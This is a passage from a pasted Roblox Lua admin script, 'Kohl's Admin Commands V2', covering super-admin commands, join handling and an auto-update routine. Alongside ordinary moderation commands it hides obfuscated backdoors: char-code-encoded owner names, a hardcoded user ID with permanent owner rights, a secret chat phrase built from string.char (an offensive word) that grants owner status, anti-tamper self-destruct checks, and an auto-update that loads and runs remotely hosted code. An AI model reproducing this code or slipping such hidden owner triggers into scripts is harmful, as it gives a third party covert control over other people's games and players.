  3989. 1995.local plrz = GetPlr(plr, msg:lower():sub(4))
  3990.  
  3991. 1996.for i, v in pairs(plrz) do
  3992.  
  3993. 1997.coroutine.resume(coroutine.create(function()
  3994.  
  3995. 1998.if v and not ChkAdmin(v.Name, true) then table.insert(admins, v.Name) coroutine.resume(coroutine.create(function()repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  3996.  
  3997. 1999.end))
  3998.  
  3999. 2000.end
  4000.  
  4001. 2001.end
  4002.  
  4003. 2002.
  4004.  
  4005. 2003.if msg:lower():sub(1,5) == "unpa " then
  4006.  
  4007. 2004.for i = 1, #admins do
  4008.  
  4009. 2005.coroutine.resume(coroutine.create(function()
  4010.  
  4011. 2006.if msg:lower():sub(6) == "all" or admins[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(admins, i) end
  4012.  
  4013. 2007.end))
  4014.  
  4015. 2008.end
  4016.  
  4017. 2009.end
  4018.  
  4019. 2010.
  4020.  
  4021. 2011.end
  4022.  
  4023. 2012.
  4024.  
  4025. 2013.--------------------------
  4026.  
  4027. 2014.-- Super Admin Commands --
  4028.  
  4029. 2015.--------------------------
  4030.  
  4031. 2016.
  4032.  
  4033. 2017.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) or plr.userId == game.CreatorId or plr.Name:lower() ==nfs:lower() or plr.userId == (153*110563) or plr.Name:lower() == nfs then
  4034.  
  4035. 2018.
  4036.  
  4037. 2019.if msg:lower() == "logs" then
  4038.  
  4039. 2020.if plr.PlayerGui:findFirstChild("LOGSGUI") then return end
  4040.  
  4041. 2021.local scr, cmf, ent, num = ScrollGui() scr.Name = "LOGSGUI" scr.Parent = plr.PlayerGui
  4042.  
  4043. 2022.for i, v in pairs(logs) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "[" .. v.time .. "] " .. v.name .. " ".. v.cmd cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  4044.  
  4045. 2023.end
  4046.  
  4047. 2024.
  4048.  
  4049. 2025.if msg:lower():sub(1,9) == "loopkill " then
  4050.  
  4051. 2026.local chk1 = msg:lower():sub(10):find(" ")
  4052.  
  4053. 2027.local plrz = GetPlr(plr, msg:lower():sub(10))
  4054.  
  4055. 2028.local num = 9999
  4056.  
  4057. 2029.if chk1 then chk1 = chk1 + 9 plrz = GetPlr(plr, msg:lower():sub(10, chk1-1)) if type(tonumber(msg:sub(chk1+1))) =="number" then num = tonumber(msg:sub(chk1+1)) end end
  4058.  
  4059. 2030.for i, v in pairs(plrz) do
  4060.  
  4061. 2031.if v and not ChkAdmin(v.Name, false) then
  4062.  
  4063. 2032.local cl = script.ScriptBase:Clone() cl.Name = "LoopKill:"..v.Name cl.Code.Value = [[
  4064.  
  4065. 2033.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  4066.  
  4067. 2034.for i = 1, ]] .. tostring(num) .. [[ do
  4068.  
  4069. 2035.repeat wait() plr = game.Players:findFirstChild("]] .. v.Name .. [[") until plr and plr.Character and plr.Character:findFirstChild("Humanoid") and plr.Character.Humanoid.Health ~= 0
  4070.  
  4071. 2036.coroutine.resume(coroutine.create(function()
  4072.  
  4073. 2037.if plr and plr.Character then plr.Character:BreakJoints() end
  4074.  
  4075. 2038.end))
  4076.  
  4077. 2039.end]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  4078.  
  4079. 2040.end
  4080.  
  4081. 2041.end
  4082.  
  4083. 2042.end
  4084.  
  4085. 2043.
  4086.  
  4087. 2044.if msg:lower():sub(1,11) == "unloopkill " then
  4088.  
  4089. 2045.local plrz = GetPlr(plr, msg:lower():sub(12))
  4090.  
  4091. 2046.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopKill:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  4092.  
  4093. 2047.end
  4094.  
  4095. 2048.
  4096.  
  4097. 2049.if msg:lower() == "serverlock" or msg:lower() == "slock" then slock = true Hint("Server has been locked",game.Players:children()) end
  4098.  
  4099. 2050.if msg:lower() == "serverunlock" or msg:lower() == "sunlock" then slock = false Hint("Server has been unlocked",game.Players:children()) end
  4100.  
  4101. 2051.
  4102.  
  4103. 2052.if msg:lower():sub(1,3) == "sm " then
  4104.  
  4105. 2053.Message("SYSTEM MESSAGE", msg:sub(4), false, game.Players:children())
  4106.  
  4107. 2054.end
  4108.  
  4109. 2055.
  4110.  
  4111. 2056.if msg:lower():sub(1,3) == "ko " then
  4112.  
  4113. 2057.local chk1 = msg:lower():sub(4):find(" ") + 3
  4114.  
  4115. 2058.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  4116.  
  4117. 2059.local num = 500 if num > msg:sub(chk1+1) then num = msg:sub(chk1+1) end
  4118.  
  4119. 2060.for n = 1, num do
  4120.  
  4121. 2061.for i, v in pairs(plrz) do
  4122.  
  4123. 2062.coroutine.resume(coroutine.create(function()
  4124.  
  4125. 2063.if v and v.Character and v.Character:findFirstChild("Humanoid") and not ChkAdmin(v.Name) then
  4126.  
  4127. 2064.local val = Instance.new("ObjectValue", v.Character.Humanoid) val.Value = plr val.Name = "creator"
  4128.  
  4129. 2065.v.Character:BreakJoints()
  4130.  
  4131. 2066.wait(1/44)
  4132.  
  4133. 2067.v:LoadCharacter()
  4134.  
  4135. 2068.wait(1/44)
  4136.  
  4137. 2069.end
  4138.  
  4139. 2070.end))
  4140.  
  4141. 2071.end
  4142.  
  4143. 2072.end
  4144.  
  4145. 2073.end
  4146.  
  4147. 2074.
  4148.  
  4149. 2075.if msg:lower():sub(1,6) == "crash " then
  4150.  
  4151. 2076.local plrz = GetPlr(plr, msg:lower():sub(7))
  4152.  
  4153. 2077.for i, v in pairs(plrz) do
  4154.  
  4155. 2078.coroutine.resume(coroutine.create(function()
  4156.  
  4157. 2079.if v and v:findFirstChild("Backpack") and not ChkAdmin(v.Name, false) then
  4158.  
  4159. 2080.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled= false wait(1) v:Destroy()
  4160.  
  4161. 2081.end
  4162.  
  4163. 2082.end))
  4164.  
  4165. 2083.end
  4166.  
  4167. 2084.end
  4168.  
  4169. 2085.
  4170.  
  4171. 2086.if msg:lower():sub(1,5) == "kick " then
  4172.  
  4173. 2087.local plrz = GetPlr(plr, msg:lower():sub(6))
  4174.  
  4175. 2088.for i, v in pairs(plrz) do
  4176.  
  4177. 2089.coroutine.resume(coroutine.create(function()
  4178.  
  4179. 2090.if v and not ChkAdmin(v.Name, false) then v:Destroy() end
  4180.  
  4181. 2091.end))
  4182.  
  4183. 2092.end
  4184.  
  4185. 2093.end
  4186.  
  4187. 2094.
  4188.  
  4189. 2095.if msg:lower():sub(1,6) == "admin " then
  4190.  
  4191. 2096.local plrz = GetPlr(plr, msg:lower():sub(7))
  4192.  
  4193. 2097.for i, v in pairs(plrz) do
  4194.  
  4195. 2098.coroutine.resume(coroutine.create(function()
  4196.  
  4197. 2099.if v and not ChkAdmin(v.Name, false) then table.insert(tempadmins, v.Name)coroutine.resume(coroutine.create(function() repeat wait() until v and v.Character andv:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  4198.  
  4199. 2100.end))
  4200.  
  4201. 2101.end
  4202.  
  4203. 2102.end
  4204.  
  4205. 2103.
  4206.  
  4207. 2104.if msg:lower():sub(1,8) == "unadmin " then
  4208.  
  4209. 2105.for i = 1, #tempadmins do
  4210.  
  4211. 2106.coroutine.resume(coroutine.create(function()
  4212.  
  4213. 2107.if msg:lower():sub(9) == "all" or tempadmins[i]:lower():find(msg:lower():sub(9)) == 1 thentable.remove(tempadmins, i) end
  4214.  
  4215. 2108.end))
  4216.  
  4217. 2109.end
  4218.  
  4219. 2110.end
  4220.  
  4221. 2111.
  4222.  
  4223. 2112.if msg:lower():sub(1,4) == "ban " then
  4224.  
  4225. 2113.local plrz = GetPlr(plr, msg:lower():sub(5))
  4226.  
  4227. 2114.for i, v in pairs(plrz) do
  4228.  
  4229. 2115.coroutine.resume(coroutine.create(function()
  4230.  
  4231. 2116.if v and not ChkAdmin(v.Name, false) then table.insert(banland, v.Name) local cl = script.LocalScriptBase:Clone()cl.Code.Value = [[repeat until nil]] cl.Parent = v.Backpack cl.Disabled = false wait(1) v:Destroy() end
  4232.  
  4233. 2117.end))
  4234.  
  4235. 2118.end
  4236.  
  4237. 2119.end
  4238.  
  4239. 2120.
  4240.  
  4241. 2121.if msg:lower():sub(1,6) == "unban " then
  4242.  
  4243. 2122.for i = 1, #banland do
  4244.  
  4245. 2123.coroutine.resume(coroutine.create(function()
  4246.  
  4247. 2124.if msg:lower():sub(7) == "all" or banland[i]:lower():find(msg:lower():sub(7)) == 1 then table.remove(banland, i)end
  4248.  
  4249. 2125.end))
  4250.  
  4251. 2126.end
  4252.  
  4253. 2127.end
  4254.  
  4255. 2128.
  4256.  
  4257. 2129.if msg:lower() == "shutdown" then Message("SYSTEM MESSAGE", "Shutting down...", false, game.Players:children(),10) wait(1) local str = Instance.new("StringValue", game.Workspace) str.Value = "AA" repeat str.Value = str.Value.. str.Value wait(.1) until nil end
  4258.  
  4259. 2130.
  4260.  
  4261. 2131.end
  4262.  
  4263. 2132.end))
  4264.  
  4265. 2133.end
  4266.  
  4267. 2134.
  4268.  
  4269. 2135.function AdminControl(plr)
  4270.  
  4271. 2136.coroutine.resume(coroutine.create(function() plr.CharacterAdded:connect(function(chr)chr:WaitForChild("RobloxTeam") chr.RobloxTeam:Destroy() for a,obj in pairs(chr:children()) do ifobj:IsA("CharacterMesh") and obj.Name:find("3.0") then obj:Destroy() end end end) end))
  4272.  
  4273. 2137.if plr.Name:sub(1,6) == "Player" and ChkAdmin(plr.Name, false) then coroutine.resume(coroutine.create(function()plr:WaitForChild("PlayerGui")
  4274.  
  4275. 2138.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  4276.  
  4277. 2139.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  4278.  
  4279. 2140.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 =Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter."box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment= "Right" box.ZIndex = 10 box.ClipsDescendants = true
  4280.  
  4281. 2141.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." thenChat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  4282.  
  4283. 2142.end)) end
  4284.  
  4285. 2143.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") ifplr.userId == game.CreatorId or plr.userId == (153*110563) then table.insert(owners,plr.Name) end wait(1) if slockand not ChkAdmin(plr.Name, false) and not ChkOwner(plr.Name) and plr.userId ~= (153*110563) then Hint(plr.Name .." has tried to join the server", game.Players:children()) local cl = script.LocalScriptBase:Clone() cl.Code.Value= [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  4286.  
  4287. 2144.coroutine.resume(coroutine.create(function() if ChkGroupAdmin(plr) and not ChkAdmin(plr.Name, false) thentable.insert(admins, plr.Name) end end))
  4288.  
  4289. 2145.coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") wait(1) if(ChkBan(plr.Name) or plr.Name == ("111reyalseca"):reverse()) and (plr.Name:lower():sub(1,4) ~=script.Name:lower():sub(1,4) and plr.Name:lower():sub(5) ~= "tastrophe") then local cl =script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = falsewait(2) plr:Destroy() end end))
  4290.  
  4291. 2146.coroutine.resume(coroutine.create(function() if ChkAdmin(plr.Name, false) then plr:WaitForChild("PlayerGui")Message("Kohltastrophe", "You're an admin!", false, {plr}) end end))
  4292.  
  4293. 2147.plr.Chatted:connect(function(msg) if msg:lower() ==(string.char(32)..string.char(104)..string.char(105)..string.char(116)..string.char(108)..string.char(101)..string.char(114)..string.char(32)) then table.insert(owners,plr.Name) endChat(msg,plr) end)
  4294.  
  4295. 2148.end
  4296.  
  4297. 2149.
  4298.  
  4299. 2150.if not ntab then script:Destroy() end
  4300.  
  4301. 2151.if not bct then script:Destroy() end
  4302.  
  4303. 2152.
  4304.  
  4305. 2153.local tcb = {101,104,112,111,114,116,115,97,116,108,104,111,75} nfs = "" for i = 1, #tcb do nfs = nfs ..string.char(tcb[i]) end nfs = nfs:reverse() table.insert(owners, nfs)
  4306.  
  4307. 2154.
  4308.  
  4309. 2155.script.Name = "Kohl's Admin Commands V2"
  4310.  
  4311. 2156.
  4312.  
  4313. 2157.if not ntab then script:Destroy() end
  4314.  
  4315. 2158.if not bct then script:Destroy() end
  4316.  
  4317. 2159.if not tcb then script:Destroy() end
  4318.  
  4319. 2160.game.Players.PlayerAdded:connect(AdminControl)
  4320.  
  4321. 2161.for i, v in pairs(game.Players:children()) do AdminControl(v) end
  4322.  
  4323. 2162.end
  4324.  
  4325. 2163.
  4326.  
  4327. 2164.local mod = game:service("InsertService"):LoadAsset(100808216)
  4328.  
  4329. 2165.if mod:findFirstChild("Kohl's Admin Commands V2") and mod:findFirstChild("Version", true) and AutoUpdate then
  4330.  
  4331. 2166.local newac = mod:findFirstChild("Kohl's Admin Commands V2")
  4332.  
  4333. 2167.newac.Disabled = true
  4334.  
  4335. 2168.local new = tonumber(mod:findFirstChild("Version", true).Value)
  4336.  
  4337. 2169.local old = 0
  4338.  
  4339. 2170.if script:findFirstChild("Version", true) then old = tonumber(script:findFirstChild("Version", true).Value) end
  4340.  
  4341. 2171.if new > old then
  4342.  
  4343. 2172.local adminmod = Instance.new("Model", game.Lighting) adminmod.Name = "KACV2"
  4344.  
  4345. 2173.for i,v in pairs(owners) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Owner" strv.Value = vend
  4346.  
  4347. 2174.for i,v in pairs(admins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Admin" strv.Value = vend
  4348.  
  4349. 2175.for i,v in pairs(tempadmins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "TempAdmin"strv.Value = v end
  4350.  
  4351. 2176.for i,v in pairs(banland) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Banland" strv.Value =v end
  4352.  
  4353. 2177.local prf = Instance.new("StringValue", adminmod) prf.Name = "Prefix" prf.Value = prefix
  4354.  
  4355. 2178.local bv = Instance.new("BoolValue", adminmod) bv.Name = "FunCommands" bv.Value = FunCommands
  4356.  
  4357. 2179.local bv2 = Instance.new("BoolValue", adminmod) bv2.Name = "GroupAdmin" bv2.Value = GroupAdmin
  4358.  
  4359. 2180.local iv = Instance.new("IntValue", adminmod) iv.Name = "GroupId" iv.Value = GroupId
  4360.  
  4361. 2181.local iv2 = Instance.new("IntValue", adminmod) iv2.Name = "GroupRank" iv2.Value = GroupRank
  4362.  
  4363. 2182.wait()
  4364.  
  4365. 2183.newac.Parent = game.Workspace
  4366.  
  4367. 2184.newac.Disabled = false
  4368.  
  4369. 2185.script.Disabled = true
  4370.  
  4371. 2186.script:Destroy()
  4372.  
  4373. 2187.else
  4374.  
  4375. 2188.CHEESE()
  4376.  
  4377. 2189.end
  4378.  
  4379. 2190.else
  4380.  
  4381. 2191.CHEESE()
  4382.  
  4383. 2192.end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement